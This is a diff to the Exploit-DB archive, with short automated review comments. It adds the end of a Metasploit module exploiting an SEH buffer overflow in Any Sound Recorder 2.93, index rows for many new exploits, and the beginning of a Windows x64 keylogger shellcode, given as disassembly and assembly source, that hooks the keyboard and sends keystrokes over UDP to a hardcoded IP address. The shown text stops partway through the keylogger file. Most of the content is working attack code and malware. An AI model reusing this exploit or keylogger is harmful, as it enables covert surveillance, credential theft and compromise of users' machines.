+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Abdullah Alıç', # Original discovery
+ 'd3ckx1 d3ck(at)qq.com', # MSF module
+ ],
+ 'References' =>
+ [
+ [ 'OSVDB', '' ],
+ [ 'EBD', '45627' ]
+ ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'process'
+ },
+ 'Platform' => 'win',
+ 'Payload' =>
+ {
+ 'BadChars' => "\x00\x0a\x0d",
+ 'DisableNops' => true,
+ 'Space' => 10000
+ },
+ 'Targets' =>
+ [
+ [ 'Any Sound Recorder 2.93',
+ {
+ 'Ret' => 0x72d12f35, # 0x72d12f35 : P/P/R FROM msacm32.drv form winxp sp3
+ 'Offset' => 900
+ }
+ ],
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Oct 25 2018',
+ 'DefaultTarget' => 0))
+
+ register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.txt']),], self.class)
+
+ end
+
+ def exploit
+ buf = "\x90"*(target['Offset'])
+ buf << "\xeb\x06#{Rex::Text.rand_text_alpha(2, payload_badchars)}" # nseh (jmp to payload)
+ buf << [target.ret] .pack('V') # seh
+ buf << make_nops(10)
+ buf << payload.encoded
+ buf << "\x90" * 200
+
+ file_create(buf)
+ handler
+
+ end
+end
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 4e22bdb53..e0c3d7e86
--- a/files_exploits.csv
+++ b/files_exploits.csv
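Review bot: The `References` array near the top of the hunk uses the key `'EBD'`, which is not a Metasploit reference type, so the exploit-db reference will not resolve; it should read `[ 'EDB', '45627' ]`, and the empty `[ 'OSVDB', '' ]` entry beside it should be removed rather than left blank. The `Description` text also drops a clause in "…Any Sound Recorder 2.93, when with the name "hack.txt"" and refers to a file named hack.txt while the `FILENAME` option below defaults to `msf.txt`; the sentence should be completed and the two names reconciled. The `Metasploit3` class name, the explicit `require 'msf/core'` and the `self.class` argument to `register_options` are all forms that current framework versions flag as deprecated; `MetasploitModule` and `register_options([...])` are the current equivalents.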
@@ -6165,6 +6165,9 @@ id,file,description,date,author,type,platform,port
 45715,exploits/linux/dos/45715.txt,"systemd - chown_one() can Dereference Symlinks",2018-10-29,"Google Security Research",dos,linux,
 45716,exploits/windows/dos/45716.txt,"ASRock Drivers - Privilege Escalation",2018-10-29,SecureAuth,dos,windows,
 45732,exploits/windows/dos/45732.txt,"Modbus Slave 7.0.0 - Denial of Service (PoC)",2018-10-29,"Ihsan Sencan",dos,windows,
+45746,exploits/hardware/dos/45746.php,"ZyXEL VMG3312-B10B < 1.00(AAPP.7) - Credential Disclosure",2018-10-30,"numan türle",dos,hardware,21
+45749,exploits/windows/dos/45749.py,"QNAP NetBak Replicator 4.5.6.0607 - Denial of Service (PoC)",2018-10-30,"Yair Rodríguez Aparicio",dos,windows,
+45750,exploits/linux/dos/45750.txt,"SIPp 3.3.990 - Local Buffer Overflow (PoC)",2018-10-30,"Nawaf Alkeraithe",dos,linux,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10063,6 +10066,9 @@ id,file,description,date,author,type,platform,port
 45697,exploits/multiple/local/45697.txt,"xorg-x11-server < 1.20.3 - Local Privilege Escalation",2018-10-25,"Hacker Fantastic",local,multiple,
 45709,exploits/windows_x86-64/local/45709.vb,"School Equipment Monitoring System 1.0 - 'login' SQL Injection",2018-10-29,"Ihsan Sencan",local,windows_x86-64,
 45710,exploits/windows_x86/local/45710.pl,"Modbus Slave PLC 7 - '.msw' Buffer Overflow (PoC)",2018-10-29,"Kağan Çapar",local,windows_x86,
+45738,exploits/windows/local/45738.py,"R 3.4.4 (Windows 10 x64) - Buffer Overflow (DEP/ASLR Bypass)",2018-10-30,"Charles Truscott",local,windows,
+45742,exploits/openbsd/local/45742.sh,"xorg-x11-server 1.20.3 - Privilege Escalation",2018-10-30,"Marco Ivaldi",local,openbsd,
+45744,exploits/windows/local/45744.rb,"Any Sound Recorder 2.93 - Buffer Overflow Local (SEH) (Metasploit)",2018-10-30,d3ckx1,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -16907,6 +16913,7 @@ id,file,description,date,author,type,platform,port
 45671,exploits/linux/remote/45671.py,"exim 4.90 - Remote Code Execution",2018-10-24,hackk.gr,remote,linux,25
 45695,exploits/windows/remote/45695.rb,"WebExec - Authenticated User Code Execution (Metasploit)",2018-10-25,Metasploit,remote,windows,
 45712,exploits/linux/remote/45712.py,"Paramiko 2.4.1 - Authentication Bypass",2018-10-29,"Adam Brown",remote,linux,
+45748,exploits/multiple/remote/45748.py,"Nutanix AOS & Prism < 5.5.5 (LTS) / < 5.8.1 (STS) - SFTP Authentication Bypass",2018-10-30,"Adam Brown",remote,multiple,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -40247,3 +40254,16 @@ id,file,description,date,author,type,platform,port
 45733,exploits/php/webapps/45733.txt,"SaltOS Erp Crm 3.1 r8126 - SQL Injection (2)",2018-10-29,"Ihsan Sencan",webapps,php,80
 45734,exploits/php/webapps/45734.txt,"SaltOS Erp Crm 3.1 r8126 - Database File Download",2018-10-29,"Ihsan Sencan",webapps,php,80
 45735,exploits/php/webapps/45735.txt,"K-iwi Framework 1775 - SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,80
+45736,exploits/php/webapps/45736.txt,"South Gate Inn Online Reservation System 1.0 - 'q' SQL Injection",2018-10-30,"Ihsan Sencan",webapps,php,80
+45737,exploits/php/webapps/45737.txt,"Electricks eCommerce 1.0 - 'prodid' SQL Injection",2018-10-30,"Ihsan Sencan",webapps,php,80
+45739,exploits/php/webapps/45739.txt,"phptpoint Pharmacy Management System 1.0 - 'username' SQL Injection",2018-10-30,"Boumediene KADDOUR",webapps,php,80
+45740,exploits/php/webapps/45740.txt,"Webiness Inventory 2.9 - Arbitrary File Upload",2018-10-30,"Boumediene KADDOUR",webapps,php,80
+45741,exploits/hardware/webapps/45741.txt,"NETGEAR WiFi Router R6120 - Credential Disclosure",2018-10-30,Wadeek,webapps,hardware,80
+45747,exploits/php/webapps/45747.txt,"MyBB Downloads 2.0.3 - SQL Injection",2018-10-30,"Lucian Ioan Nitescu",webapps,php,80
+45751,exploits/php/webapps/45751.txt,"Expense Management 1.0 - Arbitrary File Upload",2018-10-30,"Ihsan Sencan",webapps,php,80
+45752,exploits/php/webapps/45752.txt,"University Application System 1.0 - SQL Injection / Cross-Site Request Forgery (Add Admin)",2018-10-30,"Ihsan Sencan",webapps,php,80
+45753,exploits/php/webapps/45753.txt,"Notes Manager 1.0 - Arbitrary File Upload",2018-10-30,"Ihsan Sencan",webapps,php,80
+45754,exploits/php/webapps/45754.txt,"Instagram Clone 1.0 - Arbitrary File Upload",2018-10-30,"Ihsan Sencan",webapps,php,80
+45755,exploits/jsp/webapps/45755.txt,"Microstrategy Web 7 - Cross-Site Scripting / Directory Traversal",2018-10-30,"Rafael Pedrero",webapps,jsp,80
+45756,exploits/php/webapps/45756.txt,"Asaancart Simple PHP Shopping Cart 0.9 - Arbitrary File Upload / SQL Injection",2018-10-30,"Ihsan Sencan",webapps,php,80
+45757,exploits/php/webapps/45757.txt,"CI User Login and Management 1.0 - Arbitrary File Upload",2018-10-30,"Ihsan Sencan",webapps,php,80
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 8df0ac196..872f19abb
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -921,3 +921,4 @@ id,file,description,date,author,type,platform
 45538,shellcodes/linux_x86/45538.txt,"Linux/x86 - execve(/bin/sh) + MMX/ROT13/XOR Shellcode (Encoder/Decoder) (104 bytes)",2018-10-08,"Kartik Durg",shellcode,linux_x86
 45541,shellcodes/linux_mips/45541.c,"Linux/MIPS (Big Endian) - execve(/bin/sh) + Reverse TCP 192.168.2.157/31337 Shellcode (181 bytes)",2018-10-08,cq674350529,shellcode,linux_mips
 45669,shellcodes/linux_x86/45669.c,"Linux/x86 - execve(/bin/cat /etc/ssh/sshd_config) Shellcode 44 Bytes",2018-10-24,"Goutham Madhwaraj",shellcode,linux_x86
+45743,shellcodes/windows_x86-64/45743.c,"Windows/x64 - Remote (Bind TCP) Keylogger Shellcode (864 bytes) (Generator)",2018-10-30,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
diff --git a/shellcodes/windows_x86-64/45743.c b/shellcodes/windows_x86-64/45743.c
new file mode 100644
index 000000000..4ced59158
--- /dev/null
+++ b/shellcodes/windows_x86-64/45743.c
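Review bot: The new 45743 row in files_shellcodes.csv describes the entry as "Remote (Bind TCP) Keylogger", but the file it indexes, shellcodes/windows_x86-64/45743.c, titles itself "Windows x64 Remote Keylogger (UDP)" in its header comment and its embedded listing imports `'WSAStartup',1,'socket',1,'sendto',1` with the socket call annotated `mov r8b,17 ;socket()` (protocol 17 is UDP), which describes a connectionless sender rather than a bound TCP listener. The index description should follow the file, presumably `Windows/x64 - Remote (UDP) Keylogger Shellcode (864 bytes) (Generator)`. The 45743.c hunk itself continues past the end of this view.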
@@ -0,0 +1,1020 @@
+/*
+
+ # Title : Windows x64 Remote Keylogger (UDP)
+ # size : 864 bytes
+ # Author : Roziul Hasan Khan Shifat
+ # Tested On : Windows 10 x64 pro
+ # Date : 26-10-2018
+ # Email: shifath12@gmail.com
+
+*/
+
+
+
+/*
+
+
+keyl.obj: file format pe-x86-64
+
+
+Disassembly of section .text:
+
+0000000000000000 <_start>:
+ 0: eb 1d jmp 1f
+
+0000000000000002 <_init_>:
+ 2: 48 31 d2 xor rdx,rdx
+ 5: 65 48 8b 42 60 mov rax,QWORD PTR gs:[rdx+0x60]
+ a: 48 8b 40 18 mov rax,QWORD PTR [rax+0x18]
+ e: 48 8b 40 20 mov rax,QWORD PTR [rax+0x20]
+ 12: 48 8b 30 mov rsi,QWORD PTR [rax]
+ 15: 48 8b 06 mov rax,QWORD PTR [rsi]
+ 18: 48 8b 70 20 mov rsi,QWORD PTR [rax+0x20]
+ 1c: 5b pop rbx
+ 1d: 53 push rbx
+ 1e: c3 ret
+
+000000000000001f :
+ 1f: e8 de ff ff ff call 2 <_init_>
+
+0000000000000024 <_p2_>:
+ 24: 52 push rdx
+ 25: 52 push rdx
+ 26: 4c 8d 3c 24 lea r15,[rsp]
+ 2a: 48 83 ec 38 sub rsp,0x38
+ 2e: 4c 8d 24 24 lea r12,[rsp]
+ 32: 48 83 ec 58 sub rsp,0x58
+ 36: 48 8d 3c 24 lea rdi,[rsp]
+ 3a: 41 57 push r15
+ 3c: 41 54 push r12
+ 3e: 57 push rdi
+ 3f: 48 b8 48 45 52 45 49 movabs rax,0x5349544945524548
+ 46: 54 49 53
+ 49: 50 push rax
+ 4a: 48 31 c0 xor rax,rax
+ 4d: 66 b8 cc 01 mov ax,0x1cc
+ 51: 48 01 c3 add rbx,rax
+ 54: 53 push rbx
+ 55: 48 89 f1 mov rcx,rsi
+ 58: 48 8d 93 6e ff ff ff lea rdx,[rbx-0x92]
+ 5f: 4d 31 c0 xor r8,r8
+ 62: 41 b0 02 mov r8b,0x2
+ 65: 49 89 f9 mov r9,rdi
+ 68: ff d3 call rbx
+ 6a: 41 5d pop r13
+ 6c: 48 31 c0 xor rax,rax
+ 6f: 50 push rax
+ 70: 50 push rax
+ 71: 48 b8 77 73 32 5f 33 movabs rax,0x642e32335f327377
+ 78: 32 2e 64
+ 7b: 48 89 04 24 mov QWORD PTR [rsp],rax
+ 7f: 66 c7 44 24 08 6c 6c mov WORD PTR [rsp+0x8],0x6c6c
+ 86: 48 8d 0c 24 lea rcx,[rsp]
+ 8a: 48 8b 77 08 mov rsi,QWORD PTR [rdi+0x8]
+ 8e: 48 83 ec 28 sub rsp,0x28
+ 92: ff d6 call rsi
+ 94: 48 96 xchg rsi,rax
+ 96: 48 8d 4c 24 28 lea rcx,[rsp+0x28]
+ 9b: c7 01 75 73 65 72 mov DWORD PTR [rcx],0x72657375
+ a1: ff d0 call rax
+ a3: 48 89 c1 mov rcx,rax
+ a6: 49 8d 55 8c lea rdx,[r13-0x74]
+ aa: 4d 31 c0 xor r8,r8
+ ad: 41 b0 06 mov r8b,0x6
+ b0: 4c 8d 4f 10 lea r9,[rdi+0x10]
+ b4: 41 ff d5 call r13
+ b7: 48 89 f1 mov rcx,rsi
+ ba: 49 8d 55 e7 lea rdx,[r13-0x19]
+ be: 4d 31 c0 xor r8,r8
+ c1: 41 b0 03 mov r8b,0x3
+ c4: 4c 8d 4f 40 lea r9,[rdi+0x40]
+ c8: 41 ff d5 call r13
+ cb: 48 83 c4 38 add rsp,0x38
+
+00000000000000cf <_p3_>:
+ cf: 48 31 c9 xor rcx,rcx
+ d2: 66 b9 98 01 mov cx,0x198
+ d6: 48 29 cc sub rsp,rcx
+ d9: 48 83 c1 6a add rcx,0x6a
+ dd: 48 8d 14 24 lea rdx,[rsp]
+ e1: 48 8b 5f 40 mov rbx,QWORD PTR [rdi+0x40]
+ e5: ff d3 call rbx
+ e7: 48 31 c9 xor rcx,rcx
+ ea: b1 02 mov cl,0x2
+ ec: 51 push rcx
+ ed: 51 push rcx
+ ee: 5a pop rdx
+ ef: 41 58 pop r8
+ f1: 41 b0 11 mov r8b,0x11
+ f4: 48 8b 5f 48 mov rbx,QWORD PTR [rdi+0x48]
+ f8: ff d3 call rbx
+ fa: 48 89 47 08 mov QWORD PTR [rdi+0x8],rax
+ fe: 48 8b 1f mov rbx,QWORD PTR [rdi]
+ 101: 48 31 c9 xor rcx,rcx
+ 104: ff d3 call rbx
+ 106: 41 c6 07 02 mov BYTE PTR [r15],0x2
+ 10a: 66 41 c7 47 02 db 83 mov WORD PTR [r15+0x2],0x83db
+ 111: 41 c7 47 04 c1 a1 c1 mov DWORD PTR [r15+0x4],0x63c1a1c1
+ 118: 63
+ 119: 4d 31 c9 xor r9,r9
+ 11c: 41 51 push r9
+ 11e: 41 51 push r9
+ 120: 59 pop rcx
+ 121: 5a pop rdx
+ 122: b1 0d mov cl,0xd
+ 124: 49 89 c0 mov r8,rax
+ 127: b2 bc mov dl,0xbc
+ 129: 4c 01 ea add rdx,r13
+ 12c: 48 8b 5f 10 mov rbx,QWORD PTR [rdi+0x10]
+ 130: ff d3 call rbx
+
+0000000000000132 <_p4_>:
+ 132: 49 8d 4c 24 08 lea rcx,[r12+0x8]
+ 137: 48 31 d2 xor rdx,rdx
+ 13a: 52 push rdx
+ 13b: 52 push rdx
+ 13c: 41 58 pop r8
+ 13e: 41 59 pop r9
+ 140: 48 8b 5f 28 mov rbx,QWORD PTR [rdi+0x28]
+ 144: ff d3 call rbx
+ 146: 49 8d 4c 24 08 lea rcx,[r12+0x8]
+ 14b: 48 8b 5f 30 mov rbx,QWORD PTR [rdi+0x30]
+ 14f: ff d3 call rbx
+ 151: 49 8d 4c 24 08 lea rcx,[r12+0x8]
+ 156: 48 8b 5f 38 mov rbx,QWORD PTR [rdi+0x38]
+ 15a: ff d3 call rbx
+ 15c: eb d4 jmp 132 <_p4_>
+
+000000000000015e :
+ 15e: 47 rex.RXB
+ 15f: 65 74 4d gs je 1af
+ 162: 6f outs dx,DWORD PTR ds:[rsi]
+ 163: 64 75 6c fs jne 1d2
+ 166: 65 48 61 gs rex.W (bad)
+ 169: 6e outs dx,BYTE PTR ds:[rsi]
+ 16a: 64 6c fs ins BYTE PTR es:[rdi],dx
+ 16c: 65 41 01 4c 6f 61 add DWORD PTR gs:[r15+rbp*2+0x61],ecx
+ 172: 64 4c 69 62 72 61 72 imul r12,QWORD PTR fs:[rdx+0x72],0x41797261
+ 179: 79 41
+ 17b: 01 53 65 add DWORD PTR [rbx+0x65],edx
+
+000000000000017c :
+ 17c: 53 push rbx
+ 17d: 65 74 57 gs je 1d7
+ 180: 69 6e 64 6f 77 73 48 imul ebp,DWORD PTR [rsi+0x64],0x4873776f
+ 187: 6f outs dx,DWORD PTR ds:[rsi]
+ 188: 6f outs dx,DWORD PTR ds:[rsi]
+ 189: 6b 45 78 41 imul eax,DWORD PTR [rbp+0x78],0x41
+ 18d: 01 43 61 add DWORD PTR [rbx+0x61],eax
+ 190: 6c ins BYTE PTR es:[rdi],dx
+ 191: 6c ins BYTE PTR es:[rdi],dx
+ 192: 4e rex.WRX
+ 193: 65 78 74 gs js 20a
+ 196: 48 6f rex.W outs dx,DWORD PTR ds:[rsi]
+ 198: 6f outs dx,DWORD PTR ds:[rsi]
+ 199: 6b 45 78 01 imul eax,DWORD PTR [rbp+0x78],0x1
+ 19d: 47 rex.RXB
+ 19e: 65 74 4b gs je 1ec
+ 1a1: 65 79 53 gs jns 1f7
+ 1a4: 74 61 je 207
+ 1a6: 74 65 je 20d
+ 1a8: 01 47 65 add DWORD PTR [rdi+0x65],eax
+ 1ab: 74 4d je 1fa
+ 1ad: 65 73 73 gs jae 223
+ 1b0: 61 (bad)
+ 1b1: 67 65 41 01 54 72 61 add DWORD PTR gs:[r10d+esi*2+0x61],edx
+ 1b8: 6e outs dx,BYTE PTR ds:[rsi]
+ 1b9: 73 6c jae 227
+ 1bb: 61 (bad)
+ 1bc: 74 65 je 223
+ 1be: 4d rex.WRB
+ 1bf: 65 73 73 gs jae 235
+ 1c2: 61 (bad)
+ 1c3: 67 65 01 44 69 73 add DWORD PTR gs:[ecx+ebp*2+0x73],eax
+ 1c9: 70 61 jo 22c
+ 1cb: 74 63 je 230
+ 1cd: 68 4d 65 73 73 push 0x7373654d
+ 1d2: 61 (bad)
+ 1d3: 67 65 41 01 57 53 add DWORD PTR gs:[r15d+0x53],edx
+
+00000000000001d7 :
+ 1d7: 57 push rdi
+ 1d8: 53 push rbx
+ 1d9: 41 53 push r11
+ 1db: 74 61 je 23e
+ 1dd: 72 74 jb 253
+ 1df: 75 70 jne 251
+ 1e1: 01 73 6f add DWORD PTR [rbx+0x6f],esi
+ 1e4: 63 6b 65 movsxd ebp,DWORD PTR [rbx+0x65]
+ 1e7: 74 01 je 1ea
+ 1e9: 73 65 jae 250
+ 1eb: 6e outs dx,BYTE PTR ds:[rsi]
+ 1ec: 64 74 6f fs je 25e
+ 1ef: 01 56 57 add DWORD PTR [rsi+0x57],edx
+
+00000000000001f0 :
+ 1f0: 56 push rsi
+ 1f1: 57 push rdi
+ 1f2: 41 50 push r8
+ 1f4: 52 push rdx
+ 1f5: 41 51 push r9
+ 1f7: 51 push rcx
+ 1f8: 41 5b pop r11
+ 1fa: 48 31 db xor rbx,rbx
+ 1fd: 53 push rbx
+ 1fe: 53 push rbx
+ 1ff: 5a pop rdx
+ 200: 58 pop rax
+ 201: 8b 59 3c mov ebx,DWORD PTR [rcx+0x3c]
+ 204: 48 01 cb add rbx,rcx
+ 207: b2 88 mov dl,0x88
+ 209: 8b 04 13 mov eax,DWORD PTR [rbx+rdx*1]
+ 20c: 48 01 c8 add rax,rcx
+ 20f: 48 31 d2 xor rdx,rdx
+ 212: 52 push rdx
+ 213: 52 push rdx
+ 214: 52 push rdx
+ 215: 41 58 pop r8
+ 217: 41 59 pop r9
+ 219: 41 5a pop r10
+ 21b: 44 8b 40 20 mov r8d,DWORD PTR [rax+0x20]
+ 21f: 4d 01 d8 add r8,r11
+ 222: 44 8b 48 24 mov r9d,DWORD PTR [rax+0x24]
+ 226: 4d 01 d9 add r9,r11
+ 229: 44 8b 50 1c mov r10d,DWORD PTR [rax+0x1c]
+ 22d: 4d 01 da add r10,r11
+ 230: 48 31 d2 xor rdx,rdx
+ 233: 48 31 f6 xor rsi,rsi
+ 236: 56 push rsi
+ 237: 59 pop rcx
+ 238: 41 8b 34 90 mov esi,DWORD PTR [r8+rdx*4]
+ 23c: 4c 01 de add rsi,r11
+ 23f: 48 8b 7c 24 08 mov rdi,QWORD PTR [rsp+0x8]
+ 244: 48 31 c0 xor rax,rax
+ 247: 8a 04 0f mov al,BYTE PTR [rdi+rcx*1]
+ 24a: 48 ff c1 inc rcx
+ 24d: 3c 01 cmp al,0x1
+ 24f: 75 f6 jne 247
+ 251: 48 ff c2 inc rdx
+ 254: 51 push rcx
+ 255: 48 ff c9 dec rcx
+ 258: 48 87 f7 xchg rdi,rsi
+ 25b: f3 a6 repz cmps BYTE PTR ds:[rsi],BYTE PTR es:[rdi]
+ 25d: 59 pop rcx
+ 25e: 75 d3 jne 233
+ 260: 48 ff ca dec rdx
+ 263: 48 8b 7c 24 08 mov rdi,QWORD PTR [rsp+0x8]
+ 268: 48 01 cf add rdi,rcx
+ 26b: 48 89 7c 24 08 mov QWORD PTR [rsp+0x8],rdi
+ 270: 48 31 db xor rbx,rbx
+ 273: 53 push rbx
+ 274: 58 pop rax
+ 275: 66 41 8b 1c 51 mov bx,WORD PTR [r9+rdx*2]
+ 27a: 41 8b 04 9a mov eax,DWORD PTR [r10+rbx*4]
+ 27e: 4c 01 d8 add rax,r11
+ 281: 48 8b 1c 24 mov rbx,QWORD PTR [rsp]
+ 285: 48 89 03 mov QWORD PTR [rbx],rax
+ 288: 48 83 c3 08 add rbx,0x8
+ 28c: 48 89 1c 24 mov QWORD PTR [rsp],rbx
+ 290: 48 8b 5c 24 10 mov rbx,QWORD PTR [rsp+0x10]
+ 295: 48 ff cb dec rbx
+ 298: 48 89 5c 24 10 mov QWORD PTR [rsp+0x10],rbx
+ 29d: 48 31 d2 xor rdx,rdx
+ 2a0: 48 39 d3 cmp rbx,rdx
+ 2a3: 75 8e jne 233
+ 2a5: 48 83 c4 18 add rsp,0x18
+ 2a9: 5f pop rdi
+ 2aa: 5e pop rsi
+ 2ab: c3 ret
+
+00000000000002ac <_proceed_>:
+ 2ac: 48 83 ec 58 sub rsp,0x58
+ 2b0: 41 50 push r8
+ 2b2: 52 push rdx
+ 2b3: 51 push rcx
+ 2b4: 48 31 f6 xor rsi,rsi
+ 2b7: 48 b8 48 45 52 45 49 movabs rax,0x5349544945524548
+ 2be: 54 49 53
+
+00000000000002c1 :
+ 2c1: 4c 8b 14 34 mov r10,QWORD PTR [rsp+rsi*1]
+ 2c5: 48 ff c6 inc rsi
+ 2c8: 49 39 c2 cmp r10,rax
+ 2cb: 75 f4 jne 2c1
+ 2cd: 48 83 c6 07 add rsi,0x7
+ 2d1: 48 8d 1c 34 lea rbx,[rsp+rsi*1]
+ 2d5: 48 8b 3b mov rdi,QWORD PTR [rbx]
+ 2d8: 4c 8b 63 08 mov r12,QWORD PTR [rbx+0x8]
+ 2dc: 4c 8b 7b 10 mov r15,QWORD PTR [rbx+0x10]
+ 2e0: 48 85 c9 test rcx,rcx
+ 2e3: 75 68 jne 34d <_out_>
+ 2e5: 48 31 db xor rbx,rbx
+ 2e8: b3 01 mov bl,0x1
+ 2ea: 48 c1 e3 08 shl rbx,0x8
+ 2ee: 48 39 da cmp rdx,rbx
+ 2f1: 75 5a jne 34d <_out_>
+ 2f3: 48 8b 5f 20 mov rbx,QWORD PTR [rdi+0x20]
+ 2f7: 48 31 c9 xor rcx,rcx
+ 2fa: b1 14 mov cl,0x14
+ 2fc: ff d3 call rbx
+ 2fe: 66 41 89 04 24 mov WORD PTR [r12],ax
+ 303: 48 8b 5f 20 mov rbx,QWORD PTR [rdi+0x20]
+ 307: 48 31 c9 xor rcx,rcx
+ 30a: b1 10 mov cl,0x10
+ 30c: ff d3 call rbx
+ 30e: 66 41 89 44 24 02 mov WORD PTR [r12+0x2],ax
+ 314: 48 8b 5c 24 10 mov rbx,QWORD PTR [rsp+0x10]
+ 319: 8b 03 mov eax,DWORD PTR [rbx]
+ 31b: 41 89 44 24 04 mov DWORD PTR [r12+0x4],eax
+ 320: 48 83 ec 58 sub rsp,0x58
+ 324: 48 8b 4f 08 mov rcx,QWORD PTR [rdi+0x8]
+ 328: 41 54 push r12
+ 32a: 5a pop rdx
+ 32b: 4d 31 c9 xor r9,r9
+ 32e: 41 51 push r9
+ 330: 41 58 pop r8
+ 332: 41 b0 10 mov r8b,0x10
+ 335: 4c 89 7c 24 20 mov QWORD PTR [rsp+0x20],r15
+ 33a: 4c 89 44 24 28 mov QWORD PTR [rsp+0x28],r8
+ 33f: 49 83 e8 08 sub r8,0x8
+ 343: 48 8b 5f 50 mov rbx,QWORD PTR [rdi+0x50]
+ 347: ff d3 call rbx
+ 349: 48 83 c4 58 add rsp,0x58
+
+000000000000034d <_out_>:
+ 34d: 5a pop rdx
+ 34e: 41 58 pop r8
+ 350: 41 59 pop r9
+ 352: 48 8b 5f 18 mov rbx,QWORD PTR [rdi+0x18]
+ 356: 48 31 c9 xor rcx,rcx
+ 359: ff d3 call rbx
+ 35b: 48 83 c4 58 add rsp,0x58
+ 35f: c3 ret
+
+
+
+
+
+
+
+*/
+
+
+
+
+/*
+section .text
+ global _start
+_start:
+
+jmp short p1
+
+_init_:
+
+xor rdx,rdx
+mov rax,[gs:rdx+0x60] ; getting pointer of PEB structure
+mov rax,[rax+24] ;rax=PPEB->Ldr
+mov rax,[rax+32] ;Ldr->InMemoryOrderModuleList
+mov rsi,[rax]
+mov rax,[rsi]
+mov rsi,[rax+32] ;kernel32.dll base address
+
+pop rbx ;address of _p2_
+
+push rbx
+ret; transferring execution control to _p2_
+
+
+
+p1:
+call _init_
+
+
+
+;-----------------------------------------------------------------------------------------------------
+
+_p2_:
+
+
+push rdx
+push rdx
+lea r15,[rsp]
+sub rsp,56
+lea r12,[rsp] ; pointer important data (2 short int + 1 DWORD + 48 byte MSG structure )
+sub rsp,88
+lea rdi,[rsp] ; pointer to function address
+
+
+
+push r15
+push r12
+push rdi
+mov rax,'HEREITIS'
+push rax
+
+xor rax,rax
+mov ax,get_addr-_p2_
+add rbx,rax ; address of get_addr
+
+push rbx ;reserving future use
+
+mov rcx,rsi
+
+
+lea rdx,[rbx-(get_addr-kernel32_func)]
+
+
+xor r8,r8
+mov r8b,2
+mov r9,rdi
+call rbx ;loading kernel32_func functions
+
+
+;-------------------------------------------------------------------------------------
+
+pop r13 ;address of get_addr
+
+;loading ws2_32.dll
+
+xor rax,rax
+push rax
+push rax
+
+mov rax,'ws2_32.d'
+mov [rsp],rax
+mov [rsp+8],word 'll'
+lea rcx,[rsp]
+mov rsi,[rdi+8]
+sub rsp,40
+
+call rsi
+xchg rsi,rax
+
+;----------------------------------------------------------
+;loading user32.dll
+lea rcx,[rsp+40]
+mov [rcx],dword 'user'
+
+call rax
+
+
+;====================================
+;loading user32.dll functions
+mov rcx,rax
+lea rdx,[r13-(get_addr-user32_func)]
+xor r8,r8
+mov r8b,6
+lea r9,[rdi+16] ;user32.dll functions from 16
+call r13
+
+;===================================
+;loading ws2_32.dll functions
+
+mov rcx,rsi
+lea rdx,[r13-(get_addr-ws2_32_func)]
+xor r8,r8
+mov r8b,3
+lea r9,[rdi+64] ;ws2_32.dll functions from 64
+call r13
+
+add rsp,56
+;===========================================All necessary functions are loaded. Time to proceed to main task ========================================
+
+_p3_:
+
+xor rcx,rcx
+mov cx,408
+sub rsp,rcx
+add rcx,106
+lea rdx,[rsp]
+mov rbx,[rdi+64] ;WSAStartup()
+
+call rbx
+
+
+xor rcx,rcx
+
+
+
+
+mov cl,2
+push rcx
+push rcx
+pop rdx
+pop r8
+mov r8b,17
+mov rbx,[rdi+72] ;socket()
+call rbx
+
+mov [rdi+8],rax ;SOCKET
+
+
+
+
+
+mov rbx,[rdi] ; GetModuleHandleA()
+xor rcx,rcx
+call rbx
+
+;------------------------------------
+
+mov [r15],byte 2
+mov [r15+2],word 0x83db ;port change it
+mov [r15+4],dword 0x63c1a1c1 ;IP change it
+
+;-----------------------------------
+
+
+
+
+xor r9,r9
+push r9
+push r9
+pop rcx
+pop rdx
+mov cl,13
+mov r8,rax
+mov dl,_proceed_-get_addr
+add rdx,r13
+mov rbx,[rdi+16] ;SetWindowsHookExA()
+
+call rbx
+
+
+
+_p4_:
+
+lea rcx,[r12+8]
+xor rdx,rdx
+push rdx
+push rdx
+pop r8
+pop r9
+mov rbx,[rdi+40] ;GetMessageA()
+
+
+
+call rbx
+
+
+
+
+lea rcx,[r12+8]
+mov rbx,[rdi+48] ;TranslateMessage()
+
+call rbx
+
+lea rcx,[r12+8]
+mov rbx,[rdi+56] ;DispatchMessageA()
+
+call rbx
+
+
+jmp short _p4_
+
+
+
+;----------------------------------------------------------------------------------------
+kernel32_func:
+db 'GetModuleHandleA',1,'LoadLibraryA',1
+
+
+user32_func:
+db 'SetWindowsHookExA',1,'CallNextHookEx',1,'GetKeyState',1,'GetMessageA',1,'TranslateMessage',1,'DispatchMessageA',1
+
+ws2_32_func:
+db 'WSAStartup',1,'socket',1,'sendto',1
+
+
+get_addr: ; rcx=dll base , rdx=function name string address , r8=number of functions , r9=address of buffer
+db 
